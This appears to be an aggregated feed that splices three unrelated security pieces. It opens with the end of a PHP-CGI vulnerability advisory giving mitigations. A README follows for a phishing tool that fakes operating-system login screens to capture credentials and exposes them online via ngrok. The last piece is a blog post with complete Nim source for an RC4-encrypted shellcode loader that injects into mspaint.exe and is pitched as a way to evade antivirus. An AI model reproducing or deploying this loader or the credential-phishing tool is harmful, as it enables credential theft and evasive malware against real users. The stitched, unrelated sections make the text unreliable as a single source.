When configuring the Action directive to map corresponding HTTP requests to a PHP-CGI executable binary in Apache HTTP Server, this vulnerability can be exploited directly. Common configurations affected include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

Or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is affected by this vulnerability, too. Common scenarios include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP directory via ScriptAlias directive, such as:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

Mitigation Measure

It is strongly recommended that all users upgrade to the latest PHP versions of 8.3.8, 8.2.20, and 8.1.29. For systems that cannot be upgraded, the following instructions can be used to temporarily mitigate the vulnerability.

However, since PHP CGI is an outdated and problematic architecture, it’s still recommended to evaluate the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite Rules can be used to block attacks. Please note that these rules are only a temporary mitigation for Traditional Chinese, Simplified Chinese, and Japanese locales. It is still recommended to update to a patched version or migrate the architecture in practice.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. For users who use XAMPP for Windows:

XAMPP has not yet released corresponding update files for this vulnerability at the time of writing this article. If you confirm that you do not need the PHP CGI feature, you can avoid exposure to the vulnerability by modifying the following Apache HTTP Server configuration:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locating the corresponding lines:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

Reference

Thief Raccoon - Login Phishing Tool


Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


Features

  • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
  • Capture user credentials for educational demonstrations.
  • Customizable login screens that mimic real operating systems.
  • Full-screen mode to enhance the phishing simulation.

Installation

Prerequisites

  • Python 3.x
  • pip (Python package installer)
  • ngrok (for exposing the local server to the internet)

Download and Install

  1. Clone the repository:

```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon

  1. Install python venv

```bash apt install python3.11-venv

  1. Create venv:

```bash python -m venv raccoon_venv source raccoon_venv/bin/activate

  1. Install the required libraries:

```bash pip install -r requirements.txt

Usage

  1. Run the main script:

```bash python app.py

  1. Select the operating system for the phishing simulation:

After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

  1. Access the phishing page:

If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

If you want to make the phishing page accessible over the internet, use ngrok.

Using ngrok

  1. Download and install ngrok

Download ngrok from ngrok.com and follow the installation instructions for your operating system.

  1. Expose your local server to the internet:

  2. Get the public URL:

After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

How to install Ngrok on Linux?

  1. Install ngrok via Apt with the following command:

```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok

  1. Run the following command to add your authtoken to the default ngrok.yml

```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

Deploy your app online

  1. Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:

    ```bash ngrok http http://localhost:5000

Example

  1. Run the main script:

```bash python app.py

  1. Select Windows 11 from the menu:

```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2

  1. Access the phishing page:

Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

Disclaimer

This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

License

This project is licensed under the MIT License. See the LICENSE file for details.

ScreenShots

Credits

Developer: @davenisc Web: https://davenisc.com



Malware and cryptography 28: RC4 payload encryption. Simple Nim example.

1 June 2024 at 01:00

Hello, cybersecurity enthusiasts and white hackers!

cryptography

Many of my readers ask whether it is possible to write malware in a language other than C/C++/ASM.

When malware is found to be written in new programming languages, AV detections are often failing since the new language produces bytecode sequences that are relatively unknown, combined with strings of data that can throw off static-based heuristic models.

As an experiment, I decided to show how to write a simple malware example using Nim lang. The reason for this choice is the ease of the language and its flexibility for use in bypassing AV/EDR solutions.

For installation and intro you can read official documentation.

In one of my previous posts I used RC4 algorithm to encrypt the payload. Let’s create the same logic for Nim malware.

practical example 1

First of all, create RC4 algorithm logic. This is a simple algorithm and the code for its implementation in C++ looks like this:

// swap
void swap(unsigned char *a, unsigned char *b) {
  unsigned char tmp;
  tmp = *a;
  *a = *b;
  *b = tmp;
}

// key-scheduling algorithm (KSA)
void KSA(unsigned char *s, unsigned char *key, int keyL) {
  int k;
  int x, y = 0;

  // initialize
  for (k = 0; k < 256; k++) {
    s[k] = k;
  }

  for (x = 0; x < 256; x++) {
    y = (y + s[x] + key[x % keyL]) % 256;
    swap(&s[x], &s[y]);
  }
  return;
}

// pseudo-random generation algorithm (PRGA)
unsigned char* PRGA(unsigned char* s, unsigned int messageL) {
  int i = 0, j = 0;
  int k;

  unsigned char* keystream;
  keystream = (unsigned char *)malloc(sizeof(unsigned char)*messageL);
  for(k = 0; k < messageL; k++) {
    i = (i + 1) % 256;
    j = (j + s[i]) % 256;
    swap(&s[i], &s[j]);
    keystream[k] = s[(s[i] + s[j]) % 256];
	}
	return keystream;
}

// encryption and decryption
unsigned char* RC4(unsigned char *plaintext, unsigned char* ciphertext, unsigned char* key, unsigned int keyL, unsigned int messageL) {
  int i;
  unsigned char s[256];
  unsigned char* keystream;
  KSA(s, key, keyL);
  keystream = PRGA(s, messageL);

  for (i = 0; i < messageL; i++) {
    ciphertext[i] = plaintext[i] ^ keystream[i];
  }
  return ciphertext;
}

So, on Nim lang this logic looks like this:

import strutils
import sequtils
import system

proc swap(a: var byte, b: var byte) =
  let tmp = a
  a = b
  b = tmp

proc KSA(s: var seq[byte], key: seq[byte]) =
  let keyL = len(key)
  var y = 0

  # initialize
  for k in 0 ..< 256:
    s[k] = byte(k)

  for x in 0 ..< 256:
    y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
    swap(s[x], s[y.byte])

proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
  var i = 0
  var j = 0
  result = newSeq[byte](messageL)

  for k in 0 ..< messageL:
    i = (i + 1) mod 256
    j = (j + int(s[i])) mod 256
    swap(s[i], s[j.byte])
    result[k] = s[(int(s[i]) + int(s[j])) mod 256]

proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
  let messageL = len(plaintext)
  var s = newSeq[byte](256) 
  KSA(s, key)
  let keystream = PRGA(s, messageL)

  result = newSeq[byte](messageL)
  for i in 0 ..< messageL:
    result[i] = plaintext[i] xor keystream[i]

For checking corectness, add printing hex bytes of payload logic:

when isMainModule:
  let plaintext: seq[byte] = @[// payload here]
  let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]

  let ciphertext = RC4(plaintext, key)
  var enchex: seq[string]
  for b in ciphertext:
    enchex.add("0x" & $toHex(b, 2))
  echo "payload encrypted:\n", enchex.join(", ")

  let decrypted = RC4(ciphertext, key)
  var decrhex: seq[string]
  for b in decrypted:
    decrhex.add("0x" & $toHex(b, 2))
  echo "original payload:\n", decrhex.join(", ")

How we can generate payload for nim language?

For this we can use msfvenom:

msfvenom -p windows/x64/messagebox TEXT='meow-meow!' TITLE='cat' -f csharp

cryptography

In our case little bit modify this brackets and variable:

let plaintext: seq[byte] = @[
byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,
0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,
0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,
0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,
0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,
0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,
0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,
0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,
0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,
0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x09,0x01,0x00,0x00,0x48,
0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,
0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6d,0x65,0x6f,
0x77,0x2d,0x6d,0x65,0x6f,0x77,0x21,0x00,0x63,0x61,0x74,0x00
]

So the final full source code is look like this hack.nim:

import strutils
import sequtils
import system

proc swap(a: var byte, b: var byte) =
  let tmp = a
  a = b
  b = tmp

proc KSA(s: var seq[byte], key: seq[byte]) =
  let keyL = len(key)
  var y = 0

  # initialize
  for k in 0 ..< 256:
    s[k] = byte(k)

  for x in 0 ..< 256:
    y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
    swap(s[x], s[y.byte])

proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
  var i = 0
  var j = 0
  result = newSeq[byte](messageL)

  for k in 0 ..< messageL:
    i = (i + 1) mod 256
    j = (j + int(s[i])) mod 256
    swap(s[i], s[j.byte])
    result[k] = s[(int(s[i]) + int(s[j])) mod 256]

proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
  let messageL = len(plaintext)
  var s = newSeq[byte](256) 
  KSA(s, key)
  let keystream = PRGA(s, messageL)

  result = newSeq[byte](messageL)
  for i in 0 ..< messageL:
    result[i] = plaintext[i] xor keystream[i]

when isMainModule:
  let plaintext: seq[byte] = @[
    byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,
    0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
    0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
    0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,
    0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
    0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
    0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,
    0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,
    0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
    0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,
    0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,
    0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
    0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,
    0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,
    0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,
    0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
    0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
    0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,
    0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,
    0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x09,0x01,0x00,0x00,0x48,
    0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,
    0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6d,0x65,0x6f,
    0x77,0x2d,0x6d,0x65,0x6f,0x77,0x21,0x00,0x63,0x61,0x74,0x00
    ]
  let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]

  let ciphertext = RC4(plaintext, key)
  var enchex: seq[string]
  for b in ciphertext:
    enchex.add("0x" & $toHex(b, 2))
  echo "payload encrypted:\n", enchex.join(", ")

  let decrypted = RC4(ciphertext, key)
  var decrhex: seq[string]
  for b in decrypted:
    decrhex.add("0x" & $toHex(b, 2))
  echo "original payload:\n", decrhex.join(", ")

demo 1

Let’s check it in action. Compile it:

nim c -d:mingw --cpu:amd64 hack.nim

cryptography

Then, just move it to the victim’s machine (Windows 11 in my case) and run:

.\hack.exe

cryptography

For checking correctness of RC4 encryption/decryption you also can use simple C code.

practical example 2

Let’s update our code from example 1: add simple process injection logic.

For process injection, let’s create process first:

import osproc
import winim

let process = startProcess("mspaint.exe")
echo "started  process: ", process.processID

Then, add process injection logic via VirtualAllocEx, WriteProcessMemory and CreateRemoteThread:

let ph = winim.OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](process.processID)
)

when isMainModule:
    let mem = VirtualAllocEx(
        ph,
        NULL,
        cast[SIZE_T](plaintext.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )
    var btw: SIZE_T
    let wp = WriteProcessMemory(
        ph,
        mem,
        unsafeAddr payload[0],
        cast[SIZE_T](plaintext.len),
        addr btw
    )
    echo "writeprocessmemory: ", bool(wp)
    let th = CreateRemoteThread(
        ph,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](mem),
        NULL,
        0,
        NULL
    )
    echo "successfully inject to process: ", process.processID
    echo "thread Handle: ", th

The only difference, we are using encrypted payload from example 1:

let plaintext: seq[byte] = @[
byte 0x61, 0x03, 0xDF, 0x4C, 0xE0, 0x8E, 0xFF, 0x5F, 0xB2, 0x7F, 0x28, 0x22, 0xE9,
0x3B, 0x1A, 0x09, 0xB6, 0x66, 0x78, 0xCD, 0xAD, 0x67, 0xE1, 0x18, 0x82, 0x91,
0x83, 0x1C, 0xE9, 0x9D, 0x09, 0x80, 0xFB, 0x0F, 0xD7, 0x3A, 0x06, 0xB2, 0xF2, 
0x6B, 0x0C, 0xA4, 0x93, 0x29, 0xBE, 0x3D, 0x73, 0x78, 0xEE, 0xD5, 0x6B, 0xB7, 
0xB5, 0x5B, 0x98, 0xF0, 0x8E, 0x61, 0xD3, 0x3F, 0x2B, 0xEB, 0x06, 0xA2, 0x9B, 
0xE5, 0xDA, 0xED, 0x0C, 0xF1, 0xF4, 0x64, 0x82, 0x8B, 0x96, 0xD0, 0x71, 0x9A, 
0xCB, 0x59, 0x41, 0x7C, 0x52, 0x06, 0x4D, 0xC7, 0x00, 0xEC, 0x80, 0xDD, 0xDF, 
0x37, 0x4D, 0x3C, 0x25, 0x82, 0xB4, 0x37, 0xE6, 0x25, 0x75, 0xDC, 0xBE, 0xF0, 
0x1E, 0xD1, 0x1A, 0xDE, 0x2D, 0xB8, 0xA2, 0xA1, 0x6B, 0x7D, 0x0F, 0xC0, 0xC0, 
0x66, 0x4A, 0x9E, 0x9A, 0x9A, 0x93, 0x6B, 0xA4, 0x63, 0x51, 0xA0, 0x91, 0xB0, 
0x99, 0x21, 0xDC, 0xDB, 0x41, 0xF7, 0xCC, 0xB8, 0xD5, 0x4B, 0xFF, 0xA2, 0x58, 
0xA8, 0xEF, 0xE3, 0x90, 0x50, 0x3C, 0x03, 0x30, 0x42, 0x3C, 0x1B, 0x5F, 0x9C, 
0x8F, 0xF2, 0xC7, 0x19, 0xA5, 0x07, 0x3E, 0x1C, 0x70, 0x6E, 0x80, 0xDA, 0x23, 
0x37, 0x51, 0x98, 0x7D, 0xBE, 0x55, 0xF9, 0x56, 0x52, 0x0E, 0x48, 0x40, 0x2D, 
0x9A, 0xD3, 0x0F, 0xB8, 0x92, 0x62, 0xE7, 0x5C, 0x0A, 0x2E, 0xFE, 0xF8, 0x96, 
0x8E, 0x10, 0x6A, 0x04, 0x0B, 0xDD, 0x24, 0xCB, 0x18, 0x20, 0x9E, 0x23, 0x9A, 
0x57, 0xC1, 0x38, 0xC0, 0xD7, 0x0A, 0x57, 0x3E, 0x80, 0x75, 0x9B, 0x79, 0x59, 
0xB6, 0x31, 0xE4, 0x3E, 0xBA, 0xBB, 0x1E, 0x91, 0xC5, 0x10, 0xA0, 0x63, 0x6B, 
0x99, 0x9F, 0x61, 0x6C, 0xB5, 0x1A, 0x09, 0x61, 0xFD, 0x21, 0xCC, 0x64, 0xC4, 
0x9C, 0xCA, 0x15, 0xA1, 0x3B, 0x62, 0x44, 0x5B, 0x34, 0xDC, 0x06, 0xEB, 0x8F, 
0xB1, 0x50, 0x7B, 0x1C, 0x77, 0xC7, 0x8B, 0x24, 0x34, 0x5E, 0xC4, 0x02, 0x00, 
0x3F, 0x1D, 0x05, 0x2E, 0x18, 0xC5, 0xEA, 0x6D, 0x6F
]
let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]
let payload = RC4(plaintext, key)

As you can see, we are decrypt it via RC4.

The final full source code for example 2 is looks like this (hack2.nim):

import strutils
import sequtils
import system
import osproc
import winim

proc swap(a: var byte, b: var byte) =
  let tmp = a
  a = b
  b = tmp

proc KSA(s: var seq[byte], key: seq[byte]) =
  let keyL = len(key)
  var y = 0

  # initialize
  for k in 0 ..< 256:
    s[k] = byte(k)

  for x in 0 ..< 256:
    y = (y + int(s[x]) + int(key[x mod keyL])) mod 256
    swap(s[x], s[y.byte])

proc PRGA(s: var seq[byte], messageL: int): seq[byte] =
  var i = 0
  var j = 0
  result = newSeq[byte](messageL)

  for k in 0 ..< messageL:
    i = (i + 1) mod 256
    j = (j + int(s[i])) mod 256
    swap(s[i], s[j.byte])
    result[k] = s[(int(s[i]) + int(s[j])) mod 256]

proc RC4(plaintext: seq[byte], key: seq[byte]): seq[byte] =
  let messageL = len(plaintext)
  var s = newSeq[byte](256) 
  KSA(s, key)
  let keystream = PRGA(s, messageL)

  result = newSeq[byte](messageL)
  for i in 0 ..< messageL:
    result[i] = plaintext[i] xor keystream[i]

when isMainModule:
  let plaintext: seq[byte] = @[
    byte 0x61, 0x03, 0xDF, 0x4C, 0xE0, 0x8E, 0xFF, 0x5F, 0xB2, 0x7F, 0x28, 0x22, 0xE9,
    0x3B, 0x1A, 0x09, 0xB6, 0x66, 0x78, 0xCD, 0xAD, 0x67, 0xE1, 0x18, 0x82, 0x91,
    0x83, 0x1C, 0xE9, 0x9D, 0x09, 0x80, 0xFB, 0x0F, 0xD7, 0x3A, 0x06, 0xB2, 0xF2, 
    0x6B, 0x0C, 0xA4, 0x93, 0x29, 0xBE, 0x3D, 0x73, 0x78, 0xEE, 0xD5, 0x6B, 0xB7, 
    0xB5, 0x5B, 0x98, 0xF0, 0x8E, 0x61, 0xD3, 0x3F, 0x2B, 0xEB, 0x06, 0xA2, 0x9B, 
    0xE5, 0xDA, 0xED, 0x0C, 0xF1, 0xF4, 0x64, 0x82, 0x8B, 0x96, 0xD0, 0x71, 0x9A, 
    0xCB, 0x59, 0x41, 0x7C, 0x52, 0x06, 0x4D, 0xC7, 0x00, 0xEC, 0x80, 0xDD, 0xDF, 
    0x37, 0x4D, 0x3C, 0x25, 0x82, 0xB4, 0x37, 0xE6, 0x25, 0x75, 0xDC, 0xBE, 0xF0, 
    0x1E, 0xD1, 0x1A, 0xDE, 0x2D, 0xB8, 0xA2, 0xA1, 0x6B, 0x7D, 0x0F, 0xC0, 0xC0, 
    0x66, 0x4A, 0x9E, 0x9A, 0x9A, 0x93, 0x6B, 0xA4, 0x63, 0x51, 0xA0, 0x91, 0xB0, 
    0x99, 0x21, 0xDC, 0xDB, 0x41, 0xF7, 0xCC, 0xB8, 0xD5, 0x4B, 0xFF, 0xA2, 0x58, 
    0xA8, 0xEF, 0xE3, 0x90, 0x50, 0x3C, 0x03, 0x30, 0x42, 0x3C, 0x1B, 0x5F, 0x9C, 
    0x8F, 0xF2, 0xC7, 0x19, 0xA5, 0x07, 0x3E, 0x1C, 0x70, 0x6E, 0x80, 0xDA, 0x23, 
    0x37, 0x51, 0x98, 0x7D, 0xBE, 0x55, 0xF9, 0x56, 0x52, 0x0E, 0x48, 0x40, 0x2D, 
    0x9A, 0xD3, 0x0F, 0xB8, 0x92, 0x62, 0xE7, 0x5C, 0x0A, 0x2E, 0xFE, 0xF8, 0x96, 
    0x8E, 0x10, 0x6A, 0x04, 0x0B, 0xDD, 0x24, 0xCB, 0x18, 0x20, 0x9E, 0x23, 0x9A, 
    0x57, 0xC1, 0x38, 0xC0, 0xD7, 0x0A, 0x57, 0x3E, 0x80, 0x75, 0x9B, 0x79, 0x59, 
    0xB6, 0x31, 0xE4, 0x3E, 0xBA, 0xBB, 0x1E, 0x91, 0xC5, 0x10, 0xA0, 0x63, 0x6B, 
    0x99, 0x9F, 0x61, 0x6C, 0xB5, 0x1A, 0x09, 0x61, 0xFD, 0x21, 0xCC, 0x64, 0xC4, 
    0x9C, 0xCA, 0x15, 0xA1, 0x3B, 0x62, 0x44, 0x5B, 0x34, 0xDC, 0x06, 0xEB, 0x8F, 
    0xB1, 0x50, 0x7B, 0x1C, 0x77, 0xC7, 0x8B, 0x24, 0x34, 0x5E, 0xC4, 0x02, 0x00, 
    0x3F, 0x1D, 0x05, 0x2E, 0x18, 0xC5, 0xEA, 0x6D, 0x6F
    ]
  let key: seq[byte] = @[0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77]

  let payload = RC4(plaintext, key)

  let process = startProcess("mspaint.exe")
  echo "started  process: ", process.processID

  let ph = winim.OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](process.processID)
  )

when isMainModule:
    let mem = VirtualAllocEx(
        ph,
        NULL,
        cast[SIZE_T](plaintext.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )
    var btw: SIZE_T
    let wp = WriteProcessMemory(
        ph,
        mem,
        unsafeAddr payload[0],
        cast[SIZE_T](plaintext.len),
        addr btw
    )
    echo "writeprocessmemory: ", bool(wp)
    let th = CreateRemoteThread(
        ph,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](mem),
        NULL,
        0,
        NULL
    )
    echo "successfully inject to process: ", process.processID
    echo "thread Handle: ", th

demo 2

Compile practical example 2:

nim c -d:mingw --cpu:amd64 hack2.nim

cryptography

And run new file on Windows 11:

.\hack2.exe

cryptography

cryptography

To verify our payload is indeed injected into mspaint.exe process we can use Process Hacker 2, in memory section we can see:

cryptography

So, it seems our simple injection logic worked!

Upload this sample to https://websec.nl/en/scanner:

cryptography

https://websec.nl/en/scanner/result/b1497b7b-af49-48f7-870e-2d612ecd1ad3

As you can see, 4 of 40 AV engines detect our file as malicious.

Note that Microsoft Defender detect it as VirTool:Win32/Meterpreter:

cryptography

I hope this post is useful for malware researchers, C/C++ programmers and offensive security professionals.

RC4
Malware AV/VM evasion part 9
https://websec.nl/en/scanner
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

❌
❌